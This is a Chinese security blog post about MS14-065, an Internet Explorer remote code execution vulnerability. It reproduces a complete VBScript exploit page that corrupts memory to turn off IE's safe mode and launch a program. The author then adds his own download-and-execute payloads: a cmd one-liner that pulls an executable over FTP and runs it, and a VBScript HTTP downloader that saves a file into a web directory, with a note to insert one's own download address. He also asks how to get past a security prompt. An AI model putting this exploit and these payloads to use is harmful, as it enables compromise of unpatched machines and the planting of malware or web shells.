Sky's自留地

关注互联网安全,关注安全&攻击技术。

MS14-065

技术类 阅读: 11971 1 评

MS14-065  包含了一序列的IE漏洞,其中最严重的在用户在查看特定网页时
允许远程执行代码。成功利用这些漏洞的攻击者可以获得与当前用户相同的用户权限。

影响系统:2003(SP2)、Vista_32/64(SP2)、Win7_32/64(SP1)、Win8_32/64、Win8.1_32/64

目前官方已经推送了补丁。

 

alliedve.htm

//*
   allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
   https://twitter.com/yuange75
   http://hi.baidu.com/yuange1975
*//

<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<head>
</head>
<body>

<SCRIPT LANGUAGE="VBScript">
function runmumaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "notepad.exe"
end function
</script>

<SCRIPT LANGUAGE="VBScript">

dim   aa()
dim   ab()
dim   a0
dim   a1
dim   a2
dim   a3
dim   win9x
dim   intVersion
dim   rnda
dim   funclass
dim   myarray

Begin()

function Begin()
  On Error Resume Next
  info=Navigator.UserAgent

  if(instr(info,"Win64")>0)   then
     exit   function
  end if

  if (instr(info,"MSIE")>0)   then
             intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))
  else
     exit   function
  end if

  win9x=0

  BeginInit()
  If Create()=True Then
     myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
     myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)

     if(intVersion<4) then
         document.write("<br> IE")
         document.write(intVersion)
         runshellcode()
     else
          setnotsafemode()
     end if
  end if
end function

function BeginInit()
   Randomize()
   redim aa(5)
   redim ab(5)
   a0=13+17*rnd(6)
   a3=7+3*rnd(5)
end function

function Create()
  On Error Resume Next
  dim i
  Create=False
  For i = 0 To 400
    If Over()=True Then
    '   document.write(i)
       Create=True
       Exit For
    End If
  Next
end function

sub testaa()
end sub

function mydata()
    On Error Resume Next
     i=testaa
     i=null
     redim  Preserve aa(a2)

     ab(0)=0
     aa(a1)=i
     ab(0)=6.36598737437801E-314

     aa(a1+2)=myarray
     ab(2)=1.74088534731324E-310
     mydata=aa(a1)

     redim  Preserve aa(a0)
end function

function setnotsafemode()
    On Error Resume Next
    i=mydata()
    i=readmemo(i+8)
    i=readmemo(i+16)
    j=readmemo(i+&h134)
    for k=0 to &h60 step 4
        j=readmemo(i+&h120+k)
        if(j=14) then
            j=0
            redim  Preserve aa(a2)
            aa(a1+2)(i+&h11c+k)=ab(4)
            redim  Preserve aa(a0)
            j=0
            j=readmemo(i+&h120+k)
            Exit for
        end if
    next
    ab(2)=1.69759663316747E-313
    runmumaa()
end function

function Over()
    On Error Resume Next
    dim type1,type2,type3
    Over=False
    a0=a0+a3
    a1=a0+2
    a2=a0+&h8000000

    redim Preserve aa(a0)
    redim ab(a0)
    redim Preserve aa(a2)

    type1=1
    ab(0)=1.123456789012345678901234567890
    aa(a0)=10

    If(IsObject(aa(a1-1)) = False) Then
       if(intVersion<4) then
           mem=cint(a0+1)*16
           j=vartype(aa(a1-1))
           if((j=mem+4) or (j*8=mem+8)) then
              if(vartype(aa(a1-1))<>0)  Then
                 If(IsObject(aa(a1)) = False ) Then
                   type1=VarType(aa(a1))
                 end if
              end if
           else
             redim  Preserve aa(a0)
             exit  function
           end if
        else
           if(vartype(aa(a1-1))<>0)  Then
              If(IsObject(aa(a1)) = False ) Then
                  type1=VarType(aa(a1))
              end if
            end if
        end if
    end if

    If(type1=&h2f66) Then
          Over=True
    End If
    If(type1=&hB9AD) Then
          Over=True
          win9x=1
    End If

    redim  Preserve aa(a0)
end function

function ReadMemo(add)
    On Error Resume Next
    redim  Preserve aa(a2)

    ab(0)=0
    aa(a1)=add+4
    ab(0)=1.69759663316747E-313
    ReadMemo=lenb(aa(a1))

    ab(0)=0

    redim  Preserve aa(a0)
end function

</script>

</body>
</html>

既然可以执行cmd 肯定可以下载运行 研究了研究写了下列code

shell.ShellExecute "cmd.exe" , "/c @echo off & set ftpfilename=autoftp.cfg & echo open 127.0.0.1 >'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo 123 >>'%ftpfilename%' & echo bin >>'%ftpfilename%' & echo lcd d:\ >>'%ftpfilename%' & echo get calc.exe >>'%ftpfilename%' & echo bye >>'%ftpfilename%' & ftp -s:'%ftpfilename%' & del '%ftpfilename%' & start d:\calc.exe"

 

@echo off 
set ftpfilename=autoftp.cfg 
echo open 127.0.0.1 >"%ftpfilename%" 
echo 123 >>"%ftpfilename%" 
echo 123 >>"%ftpfilename%" 
echo bin >>"%ftpfilename%" 
echo lcd d:\ >>"%ftpfilename%" 
echo get calc.exe >>"%ftpfilename%" 
echo bye >>"%ftpfilename%" 
ftp -s:"%ftpfilename%" 
del "%ftpfilename%" 
start d:\calc.exe

问题是03 打开的时候会提示是否允许活动任务在本计算机执行
可破吗?

除了ftp下载,还可以http下载

echo Set xPost = CreateObject("Microsoft.XMLHTTP") >d:\webdown.vbs 
echo xPost.Open "GET",http://,0 >>d:\webdown.vbs    注:http://改为自己的下载地址
echo xPost.Send() >>d:\webdown.vbs
echo Set sGet = CreateObject("ADODB.Stream") >>d:\webdown.vbs
echo sGet.Mode = 3 >>d:\webdown.vbs
echo sGet.Type = 1 >>d:\webdown.vbs
echo sGet.Open() >>d:\webdown.vbs
echo sGet.Write(xPost.responseBody) >>d:\webdown.vbs
echo sGet.SaveToFile "d:\web1\asp\1.aspx",2 >>d:\webdown.vbs    注:d:\web1\asp\1.aspx改为自己的下载目录
cscript d:\webdown.vbs

del d:\webdown.vbs

 

 

 

MS Office 2007 and 2010 - OLE Arbitrary Command Execution
发表评论
撰写评论